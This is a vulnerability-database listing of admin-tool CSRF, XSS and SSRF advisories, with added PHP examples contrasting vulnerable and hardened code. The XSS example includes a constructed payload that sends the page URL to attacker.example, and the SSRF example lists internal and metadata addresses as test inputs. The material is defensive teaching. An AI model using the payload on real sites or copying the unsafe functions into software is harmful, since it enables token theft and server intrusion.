152 matches found
BIT-MOODLE-2024-34001 moodle: CSRF risk in admin preset tool management of presets
Actions in the admin preset tool did not include the necessary token to prevent a CSRF risk...
CVE-2022-31050
TYPO3 is an open source web content management system. Prior to versions 9.5.34 ELTS, 10.4.29, and 11.5.11, Admin Tool sessions initiated via the TYPO3 backend user interface were not revoked even if the corresponding user account was degraded to lower permissions or disabled completely. This...
PT-2025-14853 · M Files · M-Files Server Admin Tool
Name of the Vulnerable Software and Affected Versions: M-Files Server Admin tool versions prior to 25.3.14681.7 Description: The issue concerns a stored XSS in the desktop UI of the M-Files Server Admin tool. This allows authenticated local users to execute scripts through the UI. Recommendations...
CVE-2024-48232
An issue was found in mipjz 5.0.5. In the mipPost method of \app\setting\controller\ApiAdminTool.php, the value of the postAddress parameter is not validated and is passed directly into curl_exec, whose response is then output, resulting in a Server-side request forgery (SSRF) vulnerability that can read serv...
PT-2024-33043 · Mipjz · Mipjz
Name of the Vulnerable Software and Affected Versions: mipjz version 5.0.5 Description: A Server-side request forgery (SSRF) vulnerability exists due to the improper handling of the postAddress parameter in the mipPost method of the ApiAdminTool.php file. This allows an attacker to read server file...
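The two mipjz entries above describe the same defect: a request parameter becomes the URL handed to curl_exec without any check. The following PHP is an added example, not mipjz code; fetch_remote_unsafe() mirrors the reported pattern, while validate_outbound_url() and fetch_remote() are hypothetical names for a hardened replacement that restricts the scheme, refuses non-public destinations, and pins the address that was checked so curl cannot be redirected or re-resolved elsewhere.

```php
<?php
// Added example (not mipjz code). fetch_remote_unsafe() is the reported shape;
// the other functions are a hypothetical hardened replacement.

// Reported pattern: the parameter reaches curl_exec() unchecked, so
// file:///etc/passwd, http://127.0.0.1:..., or a cloud metadata address all work.
function fetch_remote_unsafe(string $postAddress)
{
    $ch = curl_init($postAddress);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    return curl_exec($ch);
}

// True only for globally routable addresses: rejects RFC 1918, loopback,
// link-local (including 169.254.169.254), 0.0.0.0/8, fc00::/7, ::1.
function is_public_ip(string $ip): bool
{
    return filter_var($ip, FILTER_VALIDATE_IP,
        FILTER_FLAG_NO_PRIV_RANGE | FILTER_FLAG_NO_RES_RANGE) !== false;
}

// Returns [url, host, port, ip] for an acceptable http(s) URL, or null.
function validate_outbound_url(string $url): ?array
{
    $p = parse_url($url);
    if ($p === false || empty($p['scheme']) || empty($p['host'])) {
        return null;
    }
    $scheme = strtolower($p['scheme']);
    if (!in_array($scheme, ['http', 'https'], true)) {
        return null;                       // file://, gopher://, dict:// ...
    }
    if (isset($p['user']) || isset($p['pass'])) {
        return null;                       // http://trusted@169.254.169.254/
    }
    $host = $p['host'];
    $port = $p['port'] ?? ($scheme === 'https' ? 443 : 80);
    // Resolve once here and pin that address for curl (CURLOPT_RESOLVE below),
    // so a DNS-rebinding attacker cannot hand curl a different IP than we checked.
    // gethostbynamel() is IPv4 only; add dns_get_record(..., DNS_AAAA) for IPv6.
    $ips = filter_var($host, FILTER_VALIDATE_IP) !== false
        ? [$host]
        : (gethostbynamel($host) ?: []);
    if ($ips === []) {
        return null;
    }
    foreach ($ips as $ip) {
        if (!is_public_ip($ip)) {
            return null;
        }
    }
    return ['url' => $url, 'host' => $host, 'port' => $port, 'ip' => $ips[0]];
}

function fetch_remote(string $postAddress): ?string
{
    $v = validate_outbound_url($postAddress);
    if ($v === null) {
        return null;
    }
    $ch = curl_init($v['url']);
    curl_setopt_array($ch, [
        CURLOPT_RETURNTRANSFER => true,
        CURLOPT_FOLLOWLOCATION => false,   // a 302 to 127.0.0.1 would bypass the check
        CURLOPT_PROTOCOLS      => CURLPROTO_HTTP | CURLPROTO_HTTPS,
        CURLOPT_RESOLVE        => ["{$v['host']}:{$v['port']}:{$v['ip']}"],
        CURLOPT_CONNECTTIMEOUT => 5,
        CURLOPT_TIMEOUT        => 10,
    ]);
    $body = curl_exec($ch);
    curl_close($ch);
    return $body === false ? null : $body;
}

// Constructed inputs; only validation runs here, nothing is fetched.
foreach ([
    'http://93.184.216.34/hook',                  // public literal IP: allowed
    'file:///etc/passwd',                         // rejected: scheme
    'http://127.0.0.1:8080/admin',                // rejected: loopback
    'http://169.254.169.254/latest/meta-data/',   // rejected: link-local
    'http://10.0.0.5/',                           // rejected: RFC 1918
] as $u) {
    echo str_pad($u, 45), validate_outbound_url($u) ? 'allowed' : 'rejected', PHP_EOL;
}
```

The check on the resolved address is what makes the difference against hostnames that point at internal ranges; blocking only literal IPs or only the loopback string is the usual incomplete fix. Where the feature genuinely needs to reach a fixed set of partners, an allowlist of hostnames is simpler and stronger than the denylist approach shown here.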
Security Bulletin: Security Vulnerabilities discovered in IBM Security Verify Directory (CVE-2022-32753, CVE-2022-32756, CVE-2022-32754)
Summary: Security Vulnerabilities discovered in Web Admin Tool provided by IBM Security Verify Directory products have been resolved. Vulnerability Details: CVEID: CVE-2022-32753 DESCRIPTION: IBM Security Verify Directory 10.0.0 uses weaker than expected cryptographic algorithms that could allow an...
CVE-2024-39241
Cross Site Scripting (XSS) vulnerability in skycaiji 2.8 allows attackers to run arbitrary code via /admin/tool/preview...
skycaiji Security Breach
Skycaiji Blue Sky Collector is a free data collection and publishing crawler software from China Nanchang Zhuolan Technology Co., Ltd, developed with php+mysql, and can be deployed on cloud servers. A security vulnerability exists in skycaiji version 2.8, which originates from a cross-site...
BIT-OPENCART-2024-21515
This affects versions of the package opencart/opencart from 4.0.0-0. A reflected XSS issue was identified in the filename parameter of the admin tool/log route. An attacker could obtain a user's token by tricking the user to click on a maliciously crafted URL. The user is then prompted to login a...
Cross site scripting in opencart
This affects versions of the package opencart/opencart from 4.0.0.0. A reflected XSS issue was identified in the filename parameter of the admin tool/log route. An attacker could obtain a user's token by tricking the user to click on a maliciously crafted URL. The user is then prompted to login a...
GHSA-QX44-885H-7P56 Cross site scripting in opencart
This affects versions of the package opencart/opencart from 4.0.0.0. A reflected XSS issue was identified in the filename parameter of the admin tool/log route. An attacker could obtain a user's token by tricking the user to click on a maliciously crafted URL. The user is then prompted to login a...
CVE-2024-21515
This affects versions of the package opencart/opencart from 4.0.0.0. A reflected XSS issue was identified in the filename parameter of the admin tool/log route. An attacker could obtain a user's token by tricking the user to click on a maliciously crafted URL. The user is then prompted to login a...
CVE-2024-21515
CVE-2024-21515 affects opencart/opencart 4.0.0.0+. A reflected XSS in the filename parameter of the admin tool/log route could enable an attacker to trick an admin user into exposing a token, prompting login, and executing a payload after authentication. If the attacker has admin privileges, this...
Reflected Cross-site Scripting
Overview opencart/opencart is a shopping cart system Affected versions of this package are vulnerable to Reflected Cross-site Scripting. A reflected XSS issue was identified in the filename parameter of the admin tool/log route. An attacker could obtain a user's token by tricking the user to clic...
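The opencart entries above all describe one reflected XSS: the filename parameter of the admin tool/log route is echoed back into the page, so a crafted link runs script in the admin's session and can read the user's token. The PHP below is an added example, not OpenCart code; render_log_page_unsafe() shows the vulnerable shape and render_log_page(), e() and normalize_log_name() are hypothetical names for the hardened form, which both encodes output for its context and refuses filenames outside a known list.

```php
<?php
// Added example (not OpenCart code). Function names are hypothetical.

// Vulnerable shape: ?filename=<script>...</script> is reflected verbatim into
// both an HTML text node and an href attribute.
function render_log_page_unsafe(string $filename): string
{
    return "<h1>Log: {$filename}</h1>"
         . "<a href=\"tool/log?filename={$filename}\">reload</a>";
}

// Contextual output encoding: HTML text and attribute values get
// htmlspecialchars(); values placed in a URL query get rawurlencode() first.
function e(string $s): string
{
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
}

// Accept only a known log name. Besides cutting off XSS at the input side,
// this closes the path traversal that a free-form filename parameter invites.
function normalize_log_name(string $filename, array $allowed): ?string
{
    return in_array($filename, $allowed, true) ? $filename : null;
}

function render_log_page(string $filename, array $allowed = ['error.log', 'access.log']): string
{
    $name = normalize_log_name($filename, $allowed);
    if ($name === null) {
        return '<h1>Log</h1><p>Unknown log file.</p>';
    }
    return '<h1>Log: ' . e($name) . '</h1>'
         . '<a href="tool/log?filename=' . e(rawurlencode($name)) . '">reload</a>';
}

// Constructed payload of the kind a crafted link would carry: breaks out of the
// href attribute and exfiltrates whatever the page or URL exposes.
$payload = '"><script>fetch("https://attacker.example/?q="+location.href)</script>';
echo render_log_page_unsafe($payload), PHP_EOL;   // script lands in the page
echo render_log_page($payload), PHP_EOL;          // rejected by the allowlist
echo render_log_page('error.log'), PHP_EOL;       // normal output, encoded
```

Output encoding alone would already neutralise the payload; the allowlist is what a log viewer should have anyway, since the parameter names a file on disk. Note that a token carried in the URL, as the entries describe, is readable by injected script through location.href regardless of cookie flags, so HttpOnly on the session cookie is not a substitute for fixing the reflection.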
GHSA-8G5H-GJWQ-W5CH Moodle Logout CSRF in admin/tool/mfa/auth.php
The logout option within MFA did not include the necessary token to avoid the risk of users inadvertently being logged out via CSRF...
GHSA-GQ9F-8RJ4-W7JC Moodle CSRF risk in admin preset tool management of presets
Actions in the admin preset tool did not include the necessary token to prevent a CSRF risk...
CVE-2024-34001
Actions in the admin preset tool did not include the necessary token to prevent a CSRF risk...
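The Moodle entries above share one root cause: a state-changing request (deleting a preset, logging out) is accepted without a per-session token, so any site the admin visits can trigger it. The PHP below is an added example, not Moodle code; handle_preset_action_unsafe() shows the defect, and csrf_token(), handle_preset_action() and preset_delete_form() are hypothetical names for the token-checked form. The parameter name sesskey follows Moodle's convention, but the check shown is this example's own, not Moodle's implementation.

```php
<?php
// Added example (not Moodle code). Function names are hypothetical.
session_set_cookie_params(['samesite' => 'Lax', 'httponly' => true, 'secure' => true]);
session_start();

// One random 256-bit token per session, created on first use.
function csrf_token(): string
{
    if (empty($_SESSION['csrf_token'])) {
        $_SESSION['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $_SESSION['csrf_token'];
}

// Reported shape: the action runs on any request carrying the right parameters,
// so <img src="/admin/tool/.../index.php?action=delete&id=3"> on a third-party
// page is enough once the admin has a live session.
function handle_preset_action_unsafe(array $req): string
{
    return ($req['action'] ?? '') === 'delete'
        ? 'deleted preset ' . (int)($req['id'] ?? 0)
        : 'no-op';
}

// Hardened: POST only, token present, compared in constant time.
function handle_preset_action(array $req, string $method): string
{
    if ($method !== 'POST') {
        return 'rejected: state change requires POST';
    }
    $sent = $req['sesskey'] ?? '';
    if (!is_string($sent) || !hash_equals(csrf_token(), $sent)) {
        return 'rejected: missing or invalid token';
    }
    return ($req['action'] ?? '') === 'delete'
        ? 'deleted preset ' . (int)($req['id'] ?? 0)
        : 'no-op';
}

// The legitimate UI carries the token in the form it renders.
function preset_delete_form(int $id): string
{
    $t = htmlspecialchars(csrf_token(), ENT_QUOTES, 'UTF-8');
    return '<form method="post" action="index.php">'
         . '<input type="hidden" name="action" value="delete">'
         . '<input type="hidden" name="id" value="' . $id . '">'
         . '<input type="hidden" name="sesskey" value="' . $t . '">'
         . '<button>Delete preset</button></form>';
}

// Constructed requests standing in for a forged cross-site request and for the
// form above being submitted by the logged-in admin.
$forged = ['action' => 'delete', 'id' => '3'];
$legit  = ['action' => 'delete', 'id' => '3', 'sesskey' => csrf_token()];
echo handle_preset_action_unsafe($forged), PHP_EOL;    // succeeds: the defect
echo handle_preset_action($forged, 'GET'), PHP_EOL;    // rejected: method
echo handle_preset_action($forged, 'POST'), PHP_EOL;   // rejected: no token
echo handle_preset_action($legit, 'POST'), PHP_EOL;    // accepted
echo preset_delete_form(3), PHP_EOL;
```

The SameSite=Lax cookie attribute set before session_start() is defence in depth, not the fix: it does nothing for the logout-via-GET case in the MFA entry above (Lax still sends the cookie on top-level navigations), which is exactly why the token check has to cover every state change, including ones that merely log the user out.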